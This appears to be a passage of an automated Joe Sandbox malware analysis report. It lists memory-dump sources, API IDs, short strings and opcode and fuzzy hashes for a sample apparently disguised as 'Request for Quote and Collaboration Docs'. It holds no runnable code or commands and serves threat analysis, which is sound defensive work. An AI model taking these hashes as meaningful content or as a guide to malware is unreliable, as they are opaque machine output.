                                                                                          • Source File: 00000000.00000002.2237599158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2237583604.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237615811.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2237631566.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2238293453.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 190613189-0
                                                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                          • Instruction ID: dad0a046b028959ebe33103b56e1cab2fddac0818810981e259aca52f0e6fc56
                                                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                          • Instruction Fuzzy Hash: 59F06232608558BFC712DFA5DD40D9FBBA8DF06260B2540B6F801F7251D674FE019BA9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0o#p$Lj#p$Lj#p
                                                                                          • API String ID: 0-1178635779
                                                                                          • Opcode ID: e4272002fe19d420c07b77afc475e01080fcdb150960a399cbe9ea0f0e2b8b63
                                                                                          • Instruction ID: fd95d2c5c4982d0025d2099ee0ff3827ca205a8aa0e270e3b12bd5957641ac83
                                                                                          • Opcode Fuzzy Hash: e4272002fe19d420c07b77afc475e01080fcdb150960a399cbe9ea0f0e2b8b63
                                                                                          • Instruction Fuzzy Hash: 8A91E474E00618CFDB18CFA9C894A9DBBF2BF89301F158069D819AB361EB349D85CF10
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0o#p$Lj#p$Lj#p
                                                                                          • API String ID: 0-1178635779
                                                                                          • Opcode ID: 00c528ad22e80b4b399cbc7665b684aaf7ea907036755edd70834d2c55db9ce5
                                                                                          • Instruction ID: 6965a8bfebee47efa29e6bb4f4fcb78907e9e7711458406fab446e57df6f4970
                                                                                          • Opcode Fuzzy Hash: 00c528ad22e80b4b399cbc7665b684aaf7ea907036755edd70834d2c55db9ce5
                                                                                          • Instruction Fuzzy Hash: DF81C374E00218CFEB18DFAAD884A9DBBF2BF89301F148169E819AB365DB305D45CF50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0o#p$Lj#p$Lj#p
                                                                                          • API String ID: 0-1178635779
                                                                                          • Opcode ID: 95a5e8d41827941f4f6c0b7488486702314cecefdcba29f9137455a98e156179
                                                                                          • Instruction ID: 6b2ddc145a284fd8457090cee401a86f8d659b3159c1240af171a722f867aa5f
                                                                                          • Opcode Fuzzy Hash: 95a5e8d41827941f4f6c0b7488486702314cecefdcba29f9137455a98e156179
                                                                                          • Instruction Fuzzy Hash: 8A81B574E00218CFEB58DFAAD884A9DBBF2BF89301F14C069E819AB365DB745945CF50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0o#p$Lj#p$Lj#p
                                                                                          • API String ID: 0-1178635779
                                                                                          • Opcode ID: fa051f0751fe0b6183e8f739c5a1f36eba5ecb36d5d3c4693728f9d48b372837
                                                                                          • Instruction ID: 3e18165de275c2c886ec54a5d0528fdccb0561512bc7fa7d0900d12067632371
                                                                                          • Opcode Fuzzy Hash: fa051f0751fe0b6183e8f739c5a1f36eba5ecb36d5d3c4693728f9d48b372837
                                                                                          • Instruction Fuzzy Hash: A781A374E00218CFEB14DFAAD984A9DBBF2BF89301F15C069E819AB365DB345945CF50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0o#p$Lj#p$Lj#p
                                                                                          • API String ID: 0-1178635779
                                                                                          • Opcode ID: f1664da5eb142075cafe5c34d8cc1c851eb6e9b85356544003524489c1fa854b
                                                                                          • Instruction ID: 6fcba6373160fd51234ba85386ded79da4405f7946e72d8c45a5aa4f0b3fcd00
                                                                                          • Opcode Fuzzy Hash: f1664da5eb142075cafe5c34d8cc1c851eb6e9b85356544003524489c1fa854b
                                                                                          • Instruction Fuzzy Hash: 6581B274E00218CFEB18DFAAD984A9DBBF2BF89305F14C069E819AB365DB345945CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 42e843e66466632621f7d6e1597bdb32b2ae3eeef2c3dd2f78eff5c922e84ffa
                                                                                          • Instruction ID: f837844022b135649142fb310c3307c02f0c3c2e60a20b6476aeb0dffd74894f
                                                                                          • Opcode Fuzzy Hash: 42e843e66466632621f7d6e1597bdb32b2ae3eeef2c3dd2f78eff5c922e84ffa
                                                                                          • Instruction Fuzzy Hash: 16A28230A44205CFCB15CFA8C994AAEBBF2BF88301F558659E815DF261D731ED89CB52
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 028d47f818278ee6c4d36f32bc8ab96f870d499f2f12d84f0974539ab95ff6ac
                                                                                          • Instruction ID: be60fa66662e3f7590952545df39066c322eac6aace3d0b2a1e40b835dcb2ae6
                                                                                          • Opcode Fuzzy Hash: 028d47f818278ee6c4d36f32bc8ab96f870d499f2f12d84f0974539ab95ff6ac
                                                                                          • Instruction Fuzzy Hash: 34325D6684D7D48FCB638B7448E825B7FB16F92205B8945DFC4C78B687DB28C609C362
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0e34dd68f8822b8512e6669c8392eec51c82a3d1cade920c21c08fb309fc153e
                                                                                          • Instruction ID: a89b17e1700dc399a30b2206e5937c42d01e41a26f7535b15e60ba3092266df9
                                                                                          • Opcode Fuzzy Hash: 0e34dd68f8822b8512e6669c8392eec51c82a3d1cade920c21c08fb309fc153e
                                                                                          • Instruction Fuzzy Hash: D9126D70A00219DFDB14DFA5C854BAEBBF6BF88301F508569E859EB391DB309D85CB90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 271e60f28c74d7ce00d7f7d41b1cb5ad276baa2ed04094d921e5ec08de133a53
                                                                                          • Instruction ID: 81f61281d6f73152740c3a2fa90e8a0852bf6401b47583e59926ce91099c50c1
                                                                                          • Opcode Fuzzy Hash: 271e60f28c74d7ce00d7f7d41b1cb5ad276baa2ed04094d921e5ec08de133a53
                                                                                          • Instruction Fuzzy Hash: 22025130A04219DFCB15CFA8E985AADBBF2BF49312F158069EC25EB2A1D730DD45CB51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $u7$(%u7$`1u7
                                                                                          • API String ID: 0-2076014177
                                                                                          • Opcode ID: fc1e6348d71c48d8f89bd8392dd76cf9eada5c1a7b8a4140d7c719227bf23cc4
                                                                                          • Instruction ID: 406480900f5e96aeab755c060281b572ccb9b422f71c031dc2d8d840f4ae3063
                                                                                          • Opcode Fuzzy Hash: fc1e6348d71c48d8f89bd8392dd76cf9eada5c1a7b8a4140d7c719227bf23cc4
                                                                                          • Instruction Fuzzy Hash: 1252B574A10619CFDB54DFA4DD94A9DBBB2FB8A301F1081A9D40DA7365DB306E86CF80
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8?y7h?y7
                                                                                          • API String ID: 0-3320340596
                                                                                          • Opcode ID: 6844033c87875e12a05a9905e1e3d0d692655428dc179920761aaa8b5b42ab5e
                                                                                          • Instruction ID: 5b884341df804e99cf56017d1a5bf93e9dbf596d044d7275b920ff9880ecc188
                                                                                          • Opcode Fuzzy Hash: 6844033c87875e12a05a9905e1e3d0d692655428dc179920761aaa8b5b42ab5e
                                                                                          • Instruction Fuzzy Hash: B2417275E01218CFDB48DFAAD88499DBBB2BF89301F248129E815BB324DB349846CF54
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: F
                                                                                          • API String ID: 0-2730988801
                                                                                          • Opcode ID: 0a9ae504196ebb79cacc03026e5fa32392cbe662ec0a15f8c185518c1d13dbac
                                                                                          • Instruction ID: 9b26d7fc02e78bc2e87ef43bd6d168b042c72d655fe3eb7129cf91647ca8325f
                                                                                          • Opcode Fuzzy Hash: 0a9ae504196ebb79cacc03026e5fa32392cbe662ec0a15f8c185518c1d13dbac
                                                                                          • Instruction Fuzzy Hash: 133148749093488FCB05DFB5D8046EDBFB4AF4B301F1401AAC845AB221EB301A89CBA1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (y78y7L>y78?y7h?y7
                                                                                          • API String ID: 0-2842196958
                                                                                          • Opcode ID: a350facc0915342a54dca486aaae03e6f9bb2e4b22f44df0319905f1ae68e01a
                                                                                          • Instruction ID: 9642d25f08e86823ac3e64836803836f9d441f901ecf274ebb30dd97922c0ad5
                                                                                          • Opcode Fuzzy Hash: a350facc0915342a54dca486aaae03e6f9bb2e4b22f44df0319905f1ae68e01a
                                                                                          • Instruction Fuzzy Hash: 41216036A00115DFDB14DB74C4809AE77A9EB9E764F20C019E8199B350DB31EE4ACBD1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4b29823e5fc299dc40deea0c7eedde6fdfdd9d57be29bc6453122eae229eeffe
                                                                                          • Instruction ID: aa711fd7f618e24a3f1910068975727d6a55d4d592eb119d2d6ad425691d5555
                                                                                          • Opcode Fuzzy Hash: 4b29823e5fc299dc40deea0c7eedde6fdfdd9d57be29bc6453122eae229eeffe
                                                                                          • Instruction Fuzzy Hash: 9C52EF34A00218DFEB15DBE4C860BAEBB73EB48301F1080ADD51A6B3A5DF365E959F51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac6a4130ceba6b97a9282fa68e4f5c5cc26bbf336260f2ad209cd47a6e72fc20
                                                                                          • Instruction ID: aa3a30bab253ee0bdd3428c06fd4796a52b92d8cd3e8228177b3306fcdd3ebc4
                                                                                          • Opcode Fuzzy Hash: ac6a4130ceba6b97a9282fa68e4f5c5cc26bbf336260f2ad209cd47a6e72fc20
                                                                                          • Instruction Fuzzy Hash: 3D127C30A04205CFCB15CF68E895AAEBBF1FF49315F158599E829DB2A1DB30ED45CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 10d7687d8de5d3989ec5d3e355d62f3a68784231a312906aa96bf5389c3a21be
                                                                                          • Instruction ID: 66a9081e474e3341a53736cffd8a7a39a5fcfe167dd8b408564208345fd39b46
                                                                                          • Opcode Fuzzy Hash: 10d7687d8de5d3989ec5d3e355d62f3a68784231a312906aa96bf5389c3a21be
                                                                                          • Instruction Fuzzy Hash: C7B1BD30708211CFDB159B748894B7A7BB2AFC8302F54856AE816CF3A1DB75CC8AD791
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 668784077e2d45673b3f84ab612a64edb33aa587f3a42ce65b846db54aee8190
                                                                                          • Instruction ID: 99b36c9ccfd58aca105ed387557de7e1b92e813f7fa3a09a846a10ccd650d30e
                                                                                          • Opcode Fuzzy Hash: 668784077e2d45673b3f84ab612a64edb33aa587f3a42ce65b846db54aee8190
                                                                                          • Instruction Fuzzy Hash: CD81A230B00505CFDB58CF69C484969BBB2BF89312BA58169D825EF365DB31EC49CBE1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf3d820052c7605678d61e961123650d95febe96ecee934587230f46bb6c6636
                                                                                          • Instruction ID: c29e7df99ef7d52428fadc23472c58c5e925ea6bf8f4ef49607c498d860046fc
                                                                                          • Opcode Fuzzy Hash: bf3d820052c7605678d61e961123650d95febe96ecee934587230f46bb6c6636
                                                                                          • Instruction Fuzzy Hash: B071E434700A05CFDB15DF68C884A6A7BE6AF99342F1540A9E826EB371DF70DC86CB50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ec5a30ba8920d0eb57c53062d65df078d4e6a27c1ff485946495f79cb1fd0a48
                                                                                          • Instruction ID: e3b2f6754ad5aae7ac980904141b677dd4d138652a00650956d045be870da065
                                                                                          • Opcode Fuzzy Hash: ec5a30ba8920d0eb57c53062d65df078d4e6a27c1ff485946495f79cb1fd0a48
                                                                                          • Instruction Fuzzy Hash: B141E131A44249DFCF11CFA4C844AADBFB2BF49315F048255E9259F2A1D370ED58CB61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 411552240d757a4baabff34c999020f0d45af8617425a0bf5cec99c82a88a458
                                                                                          • Instruction ID: 9610d1401b536343b6fd6a3e1f9f6919b4be8ec98e6cba3e4ce09fb9ba5686d5
                                                                                          • Opcode Fuzzy Hash: 411552240d757a4baabff34c999020f0d45af8617425a0bf5cec99c82a88a458
                                                                                          • Instruction Fuzzy Hash: 77417C30600245CFDB01CFA8C944B6ABBF6EF89312F558466E928CF265E775DC45CBA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5665af351bf937ec996d8b3b5198721d0fb50aca923801037bc4dcb17b524ca5
                                                                                          • Instruction ID: 3d05b451886a1f6f2199ffcf900884db8362691df3c119214a516ed8b7f66a4f
                                                                                          • Opcode Fuzzy Hash: 5665af351bf937ec996d8b3b5198721d0fb50aca923801037bc4dcb17b524ca5
                                                                                          • Instruction Fuzzy Hash: FC318331204149DFCF059FA4D9A5AAE3BB7EF88301F508024FD199B255CB35DEA5DBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 524422e74cb51430bd00b8af95d9a9d720cb6d903204042452a7c7db2b44612f
                                                                                          • Instruction ID: 52e259a562daf04673531f48bb6f6cdcfa762fcebffebbb01359f9580891d3d2
                                                                                          • Opcode Fuzzy Hash: 524422e74cb51430bd00b8af95d9a9d720cb6d903204042452a7c7db2b44612f
                                                                                          • Instruction Fuzzy Hash: 5E212430304242CBCB1517798864B7E37A6AFC530A719407ADC56EF6A5EF258C4BD351
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1f83672980f19a995480d17569adb6efae205f1de0c0849b1628e44ef2036eee
                                                                                          • Instruction ID: b29ae4e65be1c3c1a30880c8450687513dfad58dadbf45e0426d60f0b8d08c51
                                                                                          • Opcode Fuzzy Hash: 1f83672980f19a995480d17569adb6efae205f1de0c0849b1628e44ef2036eee
                                                                                          • Instruction Fuzzy Hash: 46217130304242CBDB1556698864B7F3296AFC475AF288039DC56EF7A8EF66CC879391
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4e170051647b13c74d4419ef92f4c513b19eac60029b10574f069644438b2f99
                                                                                          • Instruction ID: d9ab762a3cdcf2e519577b5c696d2870fa06b0c41e3dc7bb4496ad518929e7e7
                                                                                          • Opcode Fuzzy Hash: 4e170051647b13c74d4419ef92f4c513b19eac60029b10574f069644438b2f99
                                                                                          • Instruction Fuzzy Hash: 7421DE35300611CFC7299B29C858A2EB7A2FF897527558028EC2ADB7A4CF31DC068BD0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 05311abadfe7138a14e65fd85c60c0a0dc82577069f3cd4ed82134ff9cf54ce4
                                                                                          • Instruction ID: 014c96205809e89cd212482cc007fe9cddd2a6f6a434660d31936b9c58d23952
                                                                                          • Opcode Fuzzy Hash: 05311abadfe7138a14e65fd85c60c0a0dc82577069f3cd4ed82134ff9cf54ce4
                                                                                          • Instruction Fuzzy Hash: F8212631209288CFCB019F64D964BAE3BB2EF49311F604069FC199F255CB349D55DBA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7e4974db8bb0862fa2e0f07507aee7ae5154d718f3fd33ba2610295df378bc7
                                                                                          • Instruction ID: 35f25b45744135cb9ce98acc2962679731b5201bc7640514b5bc0779f051ac43
                                                                                          • Opcode Fuzzy Hash: d7e4974db8bb0862fa2e0f07507aee7ae5154d718f3fd33ba2610295df378bc7
                                                                                          • Instruction Fuzzy Hash: 59316F78E11208DFCB48DFA8D5948ADBBF2FF49315B204069E819AB364DB31AD45CF50
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b9ca22c7afada80f1378985d6db3678a8a445d24ed18beb7ddcb341385474dab
                                                                                          • Instruction ID: ab6a00b30fe0ac93666ddc03e7e80e2cb34df0d6c454e676ce8995a4d68511b3
                                                                                          • Opcode Fuzzy Hash: b9ca22c7afada80f1378985d6db3678a8a445d24ed18beb7ddcb341385474dab
                                                                                          • Instruction Fuzzy Hash: 55215C30E01248DFDB15CFA1D550AEDBFB6AF49305F248069E825BA290DB30DA85DF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5594d0e69450bb29983099af0f1380e2285941ce49d4a971b589aafb172faaa3
                                                                                          • Instruction ID: 4282afc0ae3e01e93c4277a267c81461a2297fa491e726d8c16ffcb9e9aa89c1
                                                                                          • Opcode Fuzzy Hash: 5594d0e69450bb29983099af0f1380e2285941ce49d4a971b589aafb172faaa3
                                                                                          • Instruction Fuzzy Hash: D511CE35705611CFC71A9B29C86852EBBB2BF893523594069E81ACF7A1CF20CC468B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d8bb596e78d857cf15ce7aea6f12015245a4bc15ff87e5769001559dfb59486e
                                                                                          • Instruction ID: 91a6b88873b623a3f5953dd848ae3ede05a92a6bf2c4fe68bb0b6eb99f1dcdd1
                                                                                          • Opcode Fuzzy Hash: d8bb596e78d857cf15ce7aea6f12015245a4bc15ff87e5769001559dfb59486e
                                                                                          • Instruction Fuzzy Hash: 6121E374D05249CFCB01DFB9D8445EDBFF0AF4A300F10526AD849B7220EB301A89CBA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                          • Instruction ID: aa864a3ae522808f2c87094be09c5eed03dc4ba5139dbb19e23f810937a4a8ad
                                                                                          • Opcode Fuzzy Hash: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
                                                                                          • Instruction Fuzzy Hash: 69016832704204AFCB068F649C217AE3BB7DFC9350B148066FD18DB290DB318E069B90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.2599503034.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_150000_Request for Quote and Collaboration Docs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
